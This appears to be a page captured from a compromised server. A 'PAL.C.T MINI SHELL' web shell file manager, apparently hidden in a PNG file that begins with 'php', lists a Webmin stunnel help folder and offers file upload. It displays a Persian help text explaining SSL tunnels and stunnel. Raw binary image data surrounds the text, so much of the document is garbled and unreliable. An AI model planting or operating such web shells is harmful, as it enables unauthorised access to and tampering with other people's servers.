php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.fa.auto.html

<header> معرفی تونل های SSL </header> SSL یک پروتکل برای رمزگذاری داده ها در یک اتصال TCP در هنگام سفر از طریق شبکه است. در ابتدا برای محافظت از ترافیک بین مرورگرهای وب و سرورها ایجاد شده است ، اما می تواند برای رمزگذاری هر نوع جریان داده ای که معمولاً از طریق پروتکل TCP ارسال می شود ، استفاده شود. <p style=";text-align:right;direction:rtl"> پروتکل SSL به مشتری ها و سرورها اجازه می دهد تا خود را از یکدیگر تأیید کنند ، به طوری که مشتری بتواند اطمینان داشته باشد که واقعاً به هاست مورد نظر خود متصل شده است. این کار با استفاده از گواهینامه هایی انجام می شود که توسط یک مجوز صدور گواهینامه توسط مشتری صادر شده باشد (تا بتوان آنها را تأیید کرد) و با یک نام میزبان خاص در ارتباط است. بدون گواهینامه ، یک مهاجم می تواند مجدداً اتصال SSL را به سرور خود هدایت کند و اطلاعات حساس را از مشتری دریافت کند که فکر می کند با سرور واقعی صحبت می کند. <p style=";text-align:right;direction:rtl"> هر داده ای که به صورت رمزگذاری نشده از طریق اینترنت سفر کند می تواند توسط مهاجمی که به یکی از شبکه هایی که از آن عبور می کند ، دستگیر و خوانده شود. حتی داده هایی که بین سیستم مشتری و سرور از طریق شبکه مسافرتی می توانند به راحتی گوش دهند. هنگامی که به یک سرور telnet ، FTP یا POP3 وصل می شوید ، رمز عبور شما از طریق شبکه ارسال می شود و بنابراین می تواند توسط یک مهاجم ضبط شود. <p style=";text-align:right;direction:rtl"> SSL می تواند برای محافظت از داده ها در این نوع موقعیت ها مورد استفاده قرار گیرد ، اما تنها در صورت پشتیبانی مشتری یا سرور از آن پشتیبانی می کند. اکثر مرورگرهای وب و کلاینت نامه ها می توانند اتصالات رمزگذاری شده HTL ، POP3 و IMAP را رمزگذاری کنند ، اما همه سرورهای وب و POP3 نمی توانند آنها را بپذیرند. مخصوصاً POP3 محافظت سخت است ، زیرا سرور استاندارد که بیشتر سیستم های یونیکس را در اختیار دارد ، اصلاً SSL را پشتیبانی نمی کند. خوشبختانه گرچه راه حلی وجود دارد - استونل. <p style=";text-align:right;direction:rtl"> STunnel یک برنامه ساده است که یک اتصال رمزگذاری نشده را به یک رمزگذاری شده SSL تبدیل می کند. به طور معمول تنظیم شده است که از یک سرور فوق العاده مانند inetd یا xinetd اجرا شود ، و سپس برنامه دیگری مانند سرور POP3 را اجرا کنید که از SSL پشتیبانی نمی کند. این طراحی به آن امکان می دهد تا از سرورهایی که بطور معمول از سرورهای inetd مانند telnet ، NNTP و IMAP استفاده می شوند محافظت کند. <p style=";text-align:right;direction:rtl"> همه سرورها نمی توانند با رمزگذاری مفید محافظت شوند ، زیرا هیچ مشتری وجود ندارد که بتواند از آنها در حالت SSL استفاده کند. به عنوان مثال ، من هرگز در مورد telnet یا FTP مشتری نتوانسته ام از SSL استفاده کند ، زیرا بسته مشترک SSH قبلاً امکان ورود به سیستم های رمزگذاری شده و انتقال فایل ها را می دهد. <p style=";text-align:right;direction:rtl"> این ماژول وبمین ، تنظیم سرویس های فوق سرور که Stunnel را برای شروع برخی از برنامه های سرور اجرا می کنند ، آسان می کند. حتی اگر این کار به صورت دستی و با استفاده از ماژول خدمات اینترنت انجام شود ، این یکی به طور خاص برای تنظیم و پیکربندی Stunnel طراحی شده است. به طور خودکار تشخیص می دهد که نصب شده اید یا xinetd نصب شده است ، تنظیمات آنها را برای بررسی تونل های SSL موجود می خواند و در هنگام ایجاد یک تونل جدید به آنها اضافه می کند. اگر هر دو نصب شوند ، تونل های SSL جدید به پیکربندی xinetd اضافه می شوند زیرا به نظر من برتر این دو است. <p style=";text-align:right;direction:rtl"><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`